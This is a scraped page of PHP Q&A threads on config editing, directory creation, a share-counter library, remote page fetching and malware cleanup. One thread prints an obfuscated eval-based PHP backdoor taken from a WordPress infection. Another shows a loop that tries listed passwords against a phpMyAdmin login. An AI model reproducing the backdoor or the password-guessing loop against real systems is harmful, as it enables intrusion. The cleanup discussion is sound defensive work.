preg_replace is only executed at the first time - php

I'm trying to edit a config file using a html form. The edit (settings.php) file looks like this:
$config['foo'] = FALSE;
$config['maintenance'] = FALSE; //this line is that what it matters
$config['bar'] = FALSE;
The idea here is change the of $config['maintenance'], so once the form is submitted (there is a checkbox named maintenance in order to set the status to true or false according to its state), I get the checkbox value as:
$status = ($_POST['maintenance'] === 'on')? "TRUE" : "FALSE";
I have debugged $status var value and everything goes fine to here. Now, I am using the regex below to find the correct line at file:
\$config\[(\s+)?(\'|")maintenance(\'|")(\s+)?\](\s+)?=(\s+)?(false|FALSE|true|TRUE);/
Initially "works" good, because I am not sure, but let me finish the explanation...
According with the code above, now I proceed to do the replacement:
//read the content and replace it
$content = preg_replace(
'/\$config\[(\s+)?(\'|")maintenance(\'|")(\s+)?\](\s+)?=(\s+)?(false|FALSE|true|TRUE);/',
'$config["maintenance"] = ' . $status . ';',
file_get_contents($file)
);
//set the new content
file_put_contents($file, $content);
When I run it the first time with the checkbox checked it works and the result is as follow:
$config['foo'] = FALSE;
$config["maintenance"] = TRUE;
$config['bar'] = FALSE;
However, no matter what I select in the checkbox, the file does not show any changes. Can you guide me to the right direction to find the bug? Thank you
Edit.
This is the html markup
<label>
<input type="checkbox" name="maintenance" /> in maintenance mode
</label>


Try this:
$status = (isset($_POST['maintenance'])) ? 'TRUE' : 'FALSE';
and:
$content = preg_replace(
'/\$config\[\s*[\'"]maintenance[\'"]\s*\]\s*=\s*(false|true);/i',
'$config["maintenance"] = ' . $status . ';',
file_get_contents($file)
);


However the code you posted works fine for me, you should do more debugging like:
error_reporting(-1);
or checking $content before and after replace. Check your error logs (or search for error message if you have display_errors set to on). There can be anything wrong. (e.g. file permissions).
Also consider:
full rewriting of config file instead of just replacing one line - it might be prone to errors.
acquiring locks while writing/read to/from the file

Related

Dynamically created directory returns "Array" 1 in 1000 times

I'm fixing up some old code that is supposed to create a directory for a customer based on the customer's last name. 999 out of 1000 times it works as expected but every now and then I get an "Unable to create base directory" error message and the debug shows me that the $file_directory in that case is simply "Array" instead of something like "\\network\path\order_data\1234567890_Smith".
Could anyone explain how this code could work the vast majority of the time but still consistently fail about .1% of instances? Or is it something other than the code? Thanks!
Note: I did not originally write this code but am tring to leave it as close to the original as possible
Edit I had a typo in my previous code but I think tliokos and Fluinc had a very good point but just wanted to fix my mistake
Code:
<?php
$file_directory = build_directory($customer, $UID);
if(!is_dir($file_directory)){ //Check to make sure it does not already exist
if(!mkdir($file_directory)){
mail("debug#example.com","Unable to create base directory","$file_directory");
}
}
function build_directory($customer, $UID){
if($customer->related_orders){
$related = explode(",", $customer->related_orders);
foreach($related as $r_UID){
$rel_order = get_order($r_UID); //fetches order object
if((isset($rel_order->file_directory) && $rel_order->file_directory != "")){
return $rel_order->file_directory;
}
}
}
//Here is where I made my correction
$paths = array('\\\\network\\path');
$base = $paths[0];
//Test if directory is already assigned
if(is_dir($base . "\\order_data\\".$UID."_".str_replace(" ","_",$customer->last_name)."\\")){
return $base . "\\order_data\\".$UID."_".str_replace(" ","_",$customer->last_name)."\\";
}
if($base){
return $base . "\\order_data\\".$UID."_".str_replace(" ","_",$customer->last_name)."\\";
}
}
?>

Change $base = array('\\network\path');
To $base = '\\network\path';

I think the problem is in the build_directory() function and more specifically after the first if.
So if the customer has no related orders, you are trying to concatenate an Array with a string and the result is like
Array\order_data\....
Try o change
$base = array('\\network\path');
to
$base = '\\network\path';

So the problem ended up being framework/user related.
We discovered that if the user refreshed the page during the directory creation it would create the same directory twice which our framework would save as an array of identical paths.

Google + button counts showing "0" using the Sharrre library ( Json , Php )

So checked via a phpinfo() and Safe Mode on my server is off, Curl is activated and there are no reasons for it not to work.
I also made sure Sharrre.php is in my root directory. Even included the Curlurl to the php file. Tried both absolute and relative linking. The google button with the counter shows as soon it is uploaded but not as expected because the counter shows 0 the entire time.
The culprit seems to be: $json = array('url'=>'','count'=>0);
After a few lines of other code we got this:
if(filter_var($_GET['url'], FILTER_VALIDATE_URL)){
if($type == 'googlePlus'){ //source http://www.helmutgranda.com/2011/11/01/get-a-url-google-count-via-php/
$contents = parse('https://clients6.google.com/rpc?key=AIzaSyCKSbrvQasunBoV16zDH9R33D88CeLr9gQurl=' . $url . '&count=true');
preg_match( '/window\.__SSR = {c: ([\d]+)/', $contents, $matches );
if(isset($matches[0])){
$json['count'] = (int)str_replace('window.__SSR = {c: ', '', $matches[0]);
}
}
So either the google url code is not valid anymore or... well maybe there is something wrong with the suspected culprit because:
when changed to a value higher than 0 $json = array('url'=>'','count'=>15);
It shows 15 counts as you can see. I want it to be dynamic though and get the counts I already have and update those per click.
What can be done to solve this?

In my particular case the problem was in the asignement of the URL to the Curl object.
The original script sharrre.php sets the URL by asigning it to an array element of the curl object, but this is not working and causes Google counter not retrieve any amount.
Instead, the URL must be asigned by the curl_setopt() function.
This resolved this problem in my case:
sharrre.php:
//...
$ch = curl_init();
//$options[CURLOPT_URL] = $encUrl; // <<<--- not working! comment this line.
curl_setopt_array($ch, $options);
curl_setopt($ch, CURLOPT_URL, $encUrl ); // <<<--- Yeeaa, working! Add this line.
//...
Hope this help.

Find and replace a string in multiple files in whole server

My server gets malware which was inserted a bunch of lines code in every php file now I want to remove that using a script. So initially I am trying to find and replace in a single file and later I will try for all the php files.
<?php
$oldMessage = "$udpyrtpnkn = \'6]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x786~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjmeplace(\"%x2f%50%x2e%52%x29%57%x65\",\"%x65%166%x61%154%x28%151%.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<-s.973:8297f:5297e:56-%x5c%x7878r.9<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z8b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x756<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257Upo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7MPT7-NBFSUT%x5c%x7860x5c%x7878<~!!%x5c%x7825s:N}#-%x5c825-*.%x5c%x7825)euhA)3of>2bd%x5c%x78825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x%x7825>%x5c%x782fh%x5c%x7825:<f!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%825tzw%x5c%x782f%x5c%x7824)#%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5cqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%%x785c2b%x5c%x7825!>!2p%x57]278]225]241]334]368]322]3]36<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7c%x7825tmw!>!#]y84]275]y83]273]y76x5c%x78272qj%x5c%x78256<^#zsfv7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5tRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#c73]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%5.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78768]y7f#<!%x5c%x7825tww!825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bgj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5cppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hf27{**u%x5c%x7825-#jt0}Z;0]=]7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c]277#<%x5c%x7825t2w>#78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<]281]y43]78]y33]65]y31]55]y85]c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOx7825)!gj!|!*1?hmg%x5c$n){return chr(ord($n)-1);} #error_reporting(0); preg_r-id%x5c%x7825)uqpuft%xLDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbx5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%2f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y782]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%53]Kc]55Ld]55#*<%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUobz+sfwjidsb%x5c%x7860bj+upcotn+q.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{6%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x85:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y35c%x787f<*XAZASV<*w%%x5c%x7827,*c%x5c%x7827,*b%x5c%x7-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x7x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tu4%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x55c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1r#%x5c%x785cq%x5c%x78257%x5c%x782f7###7%x5c%x782f7^#iubq#%x%x5c%x7825fdy)##-!#~<%75L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]8#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72x7824<!%x5c%x7825o:!>!%xsvufs!|ftmf!~<**9.-j%x%x5c%x7825yy>#]D6]281L125rN}#QwTW%x5c%x7825hIr%x5c%x785c1^FH#%x5c%x7827rfs%x5c%x78256~85c}X%x5c%x7824<!%x5c%x7820#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x525!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782fpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2pssfw)%x5c%x7825c*W%xx5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f7825bG9}:}.}-}!#*<%x5c%x77825bss-%x5c%x7825r%x5c%x7878B%c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x78<jg!)%x5c%x7825z>>2*!%x5c%x782#%x5c%x782f#M5]DgP5]D6#<%x5c%x78]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]2x5c%x7825w:!>!%x5c%x78246767~6<Cw6<5)}.;%x5c%x7860UQPMSVD!bT-%x5c%x7825bT-%x5c%x7825hW~c%x7824*!|!%x5c%x7824-%x5c%xq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfe%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x78Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x76]258]y6g]273]y76]271]y7d]252]y7svmt+fmhpph#)zbssb!-#**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78bP#-#Q#-#B#-#T#-#E#-#G#-5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x782_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x7825pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x156%x75%156%x61\"]=1; function fjfgg(x74%141%x72%164\") && (!isset($GLOBALS[\"%x6125fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]25c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452860TW~%x5c%x7824<%x5c%x78e%x5c%x773\", NULL); }%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V7;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvb!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%xo]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x7821]K78:56985:6197g:74985-rr.93e:5597f76#<%x5c%x78e%x5c%x78b%FHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5825%x5c%x787f!<X>b%x5c%x7825Z<#o64]284]364]6]234]342]58]24]31#-%x5c%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5>!%x5c%x782400~:<h%x%x5c%x7827Y%x5c%x782564]256#<!%x5c%x7825ff2!>!b0%x28%42%x66%152%x66%147%x6x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3x6d%160%x6c%157%x64%145%<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x786x5c%x7825h>#]y31]278]y3e]8]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x7x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6Rx7825=*h%x5c%x7825)m%x5cssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x58W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|824-%x5c%x7824y7%x5c%x7824-%x5c%x87fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***7860gvodujpo)##-!#~<#%x5c%x782f%x5c%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmg#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787%42%x2c%163%x74%162%x5f%163%x70%15h%x5c%x7825)sutcvt)esp>hmg%x5c-%x5c%x7825r%x5c%x785c2^-qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%8]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%0msvd}R;*msv%x5c%x782x5c%x7825h>EzH,2W%x5c%x78255c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#7825mm!>!#]y81]273]yq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)g%156%x75%156%x61\"])))) { $GLOBALS[\"%x61%7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-buc%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnbE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x2#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5cj%x5c%x7825-bubE{h%x5c%x|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860x28%141%x72%162%x61%171%x5f%155%x61%165c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%xe]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9])!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%xj6<^#Y#%x5c%x785cq%x5c%x7825oj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%xf%x5c%x7827,*e%x5c%x7827,*d7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[Ax5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y7d2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j5z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%xif((function_exists(\"%x6f%142%x5f%163%%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}65c%x785c%x5c%x7825j:^<!%x5c%x7825w%x%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftm%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x78247825#%x5c%x782f#o]#%xsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssuc%x7878:!>#]y3g]61]y3f]63]y3:]68]y]88]5]48]32M3]317]445]212]445]43]321]4%x5c%x7825)}k~~~<ftmbg!o787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)f%x7825)!gj!<**2-4-bubE{>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%xufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x75tzw>!#]y76]277]y72]265]y39]274]y85]2x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78255c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x#%x5c%x782f#%x5c%x782wN;#-Ez-1H*WCw*[!%x5c%x78f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!6<%x5c%x787fw6*CW&)7gj6<827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f3tpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]5%x7827u%x5c%x7825)7fmji%x5c%x7878627;mnui}&;zepc}A;~!}%x5x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d/(.*)/epreg_replacebsupukrgnh'; $mrvphzdexz = explode(chr((205-161)),'8660,38,4858,43,7465,40,4822,36,2103,55,110,61,5905,24,7852,38,5828,27,6847,35,2874,70,8962,34,5476,23,3943,35,4777,45,5691,35,1721,47,171,55,2513,70,49,61,9608,24,9938,62,9820,34,5929,53,5395,45,373,39,3368,28,921,48,7810,42,507,21,2180,38,9632,38,1768,47,6937,62,1044,30,3009,59,9384,64,7404,61,8045,28,5781,22,4170,59,4709,68,2730,63,6564,62,9058,43,9727,45,2434,46,4128,42,6806,41,8150,58,8698,62,6173,46,6037,57,7151,21,3978,23,2158,22,4658,51,5243,47,9194,37,4229,63,9034,24,3288,22,6718,38,8073,50,7505,48,7596,58,7705,40,5982,55,1548,51,7745,24,1074,68,2081,22,9101,23,6882,30,5566,56,7553,43,3573,70,5134,49,866,26,7255,61,969,41,561,37,3534,39,6626,56,8123,27,2698,32,9231,52,6467,64,4387,49,4292,43,2480,33,4469,21,1815,43,8907,55,1212,49,8416,43,5726,35,2018,63,5499,67,5622,32,412,34,2218,42,4058,70,8796,46,686,48,3663,43,9502,21,9548,60,10051,55,10000,51,7769,41,7316,68,1652,69,9320,64,8004,41,5183,60,2583,41,2678,20,2260,63,6256,68,8250,66,762,56,4335,52,9854,23,3762,65,1858,28,3422,54,8886,21,6219,37,3396,26,9283,37,1261,66,9877,61,1010,34,1927,21,3889,54,1461,23,5761,20,1599,53,656,30,4490,54,4544,36,6756,50,6324,24,9772,48,8316,56,8595,65,7199,56,3264,24,7890,46,7384,20,4436,33,5803,25,6348,65,4030,28,1886,41,8842,44,5290,47,818,48,8208,42,1142,70,446,61,6531,33,8459,43,9124,70,6682,36,2793,37,3211,53,6120,53,2830,44,3643,20,5337,58,3476,58,1391,70,6413,54,7172,27,9523,25,3333,35,6912,25,3157,54,7654,51,3731,31,6094,26,5440,36,226,35,2624,54,7936,68,1948,40,3310,23,3857,32,4901,69,3090,67,2412,22,3706,25,1484,64,4001,29,3068,22,5855,50,892,29,5035,53,8996,38,5654,37,9670,57,1327,64,528,33,7067,47,7114,37,8560,35,598,58,4970,65,8760,36,2944,65,261,67,3827,30,8502,58,5088,33,328,45,734,28,4635,23,9448,54,4580,55,8372,44,0,49,2323,45,6999,68,1988,30,2368,44,5121,13'); $wtnsmruwng=substr($udpyrtpnkn,(48065-37959),(24-17)); if (!function_exists('rczvdpjblj')) { function rczvdpjblj($syascgyczg, $weichsdvue) { $lilckbfxmb = NULL; for($xoosaeyubj=0;$xoosaeyubj<(sizeof($syascgyczg)/2);$xoosaeyubj++) { $lilckbfxmb .= substr($weichsdvue, $syascgyczg[($xoosaeyubj*2)],$syascgyczg[($xoosaeyubj*2)+1]); } return $lilckbfxmb; };} $jmmhxfkfmg=\"\x20\57\x2a\40\x67\146\x6b\170\x62\156\x62\144\x6d\170\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x31\55\x31\67\x34\51\x29\54\x20\143\x68\162\x28\50\x33\61\x33\55\x32\62\x31\51\x29\54\x20\162\x63\172\x76\144\x70\152\x62\154\x6a\50\x24\155\x72\166\x70\150\x7a\144\x65\170\x7a\54\x24\165\x64\160\x79\162\x74\160\x6e\153\x6e\51\x29\51\x3b\40\x2f\52\x20\153\x62\154\x6e\167\x7a\161\x71\147\x6b\40\x2a\57\x20\"; $yofbztmjsc=substr($udpyrtpnkn,(68058-57945),(58-46)); $yofbztmjsc($wtnsmruwng, $jmmhxfkfmg, NULL); $yofbztmjsc=$jmmhxfkfmg; $yofbztmjsc=(449-328); $udpyrtpnkn=$yofbztmjsc-1;";
$deletedFormat = "";
//read the entire string
$str=file_get_contents('wp-load.php');
//replace something in the file string - this is a VERY simple example
$str=str_replace("$oldMessage", "$deletedFormat", $str);
file_put_contents('wp-load.php', $str);
?>
But this was giving me error can any one give suggestions how to do this and remove this malware?

For wordpress malware there is a plugin available.
Wordfence is a plugin which will find malicious code in your whole wordpress site and removes it also.
May be this will help you and save you time.

how to echo data that we read with file_get_contents

i want to check remote url's page contents. IF remote site's page content contains string http://yahoo.com set $qqq = YH if not contains $qqq = NOYH. i am not talking about "url of that page" im talking about page content of url
$url = "'".$get['url']."'";
$needle = "http://yahoo.com/";
$contents = file_get_contents($url);
if(stripos($contents, $needle) !== false) {
$qqq = "YH";
}
But it's not working. Can anybody help me with the correct syntax? thanks..

$url = $get['url'];
$needle = "http://yahoo.com/";
$contents = file_get_contents($url);
if(stripos($contents, $needle) !== false) {
$qqq = "YH";
echo $qqq; // <--in order to echo, you need to call echo.
}
If your goal is just to echo YH if it exists, you can just call it directly with,
echo "YH";
Rather than storing it into a variable.

It think your code won't work. For a number of reasons:
In your first line, you create a string, that contains single-quotes. So basically, $url contains something like 'http://url.here'. If you pass this to file_get_contents you get an error:
$url = "'http://www.google.com'";
echo file_get_contents($url);
Warning: file_get_contents('http://www.google.com/'): failed to open stream:
No such file or directory in ...
You said want to check whether $url contains a certain string. But you are checking whether the document the URL is pointing to, contains this string.
3. Maybe you mean $_GET instead of $get to retrieve the parameter url that is contained in the URL?
Ok, I read from the comments that you indeed want to search for the string in the content. Still, the first line of code is wrong, so it is probably:
$needle = "http://yahoo.com/";
$contents = file_get_contents($get['url']);
if(stripos($contents, $needle) !== false) {
$qqq = "YH";
}
(<?= $qqq ?> should work as it is).

There seems to be some confusion with your question and the title.
To answer "if $url contains http://yahoo.com/" then the following will do:
$url = "'".$get['url']."'";
$needle = "http://yahoo.com/";
if(stripos($url, $needle) !== false) {
$qqq = "YH";
}
Of course, you can use <?=$qqq?> to output the result.

You need to debug, so break it down step by step:
<?PHP
// make sure you see any errors (remove this later)
error_reporting(E_ALL);
ini_set('display_errors',1);
$url = $get['url'];
die($url);
?>
Is the URL correct?
<?PHP
// make sure you see any errors (remove this later)
error_reporting(E_ALL);
ini_set('display_errors',1);
$url = $get['url'];
die(file_get_contents($url));
?>
Does your script echo what looks like the response from $url?
Then continue building out and testing...
Without seeing all of your code, nobody here will be able to guess what you're doing wrong, but it should be easy, fun, and instructional for you to figure it out for yourself.
I hope this answer sends you off in the right direction.

Make sure you have PHP warnings on -- you should always set error_reporting(E_ALL) in a development environment anyway.
Make sure you have allowed URIs as parameters for fopen based functions allow_url_fopen - http://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen

Phpmyadmin login script

I trying to code a login script for phpmyadmin
<?php
$user = "Domain";
$passwords = file("passwords.txt");
foreach ( $passwords as $pass){
$source = file_get_contents("http://dbadmin.one.com/index.php?lang=en&server=1&pma_username=$user&pma_password=$pass");
if(preg_match("/Database/", $source)):
echo "Login Worked with: {$pass}";
endif;
}
?>
My Problem is it , it dont works here
echo "Login Worked with: {$pass}";
Can you see the problem?

Not necessarily the solution to your problem, but some basic error checking might point you in the right direction. Your problem may even begin at the initial call to file.
$passwords = file("passwords.txt");
if (!$passwords) {
echo 'Unable to read password file';
} //etc
$source = file_get_contents("http://dbadmin.one.com/index.php?lang=en&server=1&pma_username=$user&pma_password=$pass");
if (!$source) {
echo 'Unable to read file source';
} //etc
Also as a side note if you were calling this function on a file outside your filesystem wouldn't you only get the output (HTML) similar to calling it in your browser (not sure if that was your intention).

$source = file_get_contents("http://dbadmin.one.com/index.php?lang=en&server=1pma_username=$user&pma_password=$pass");
if(preg_match("/Database/", $source)):
The value of $source is going to be the full HTML response of getting the url:
http://dbadmin.one.com/index.php?lang=en&server=1&pma_username=$user&pma_password=$pass
preg_match is only going to match on the first line of that string. You will need to parse the string differently or replace any newline characters so it will match on the whole file.
It also looks like you're testing logins to a database using the username "Domain" with a number of different passwords. Not sure if that was your intention, but it seems a bit odd.

Categories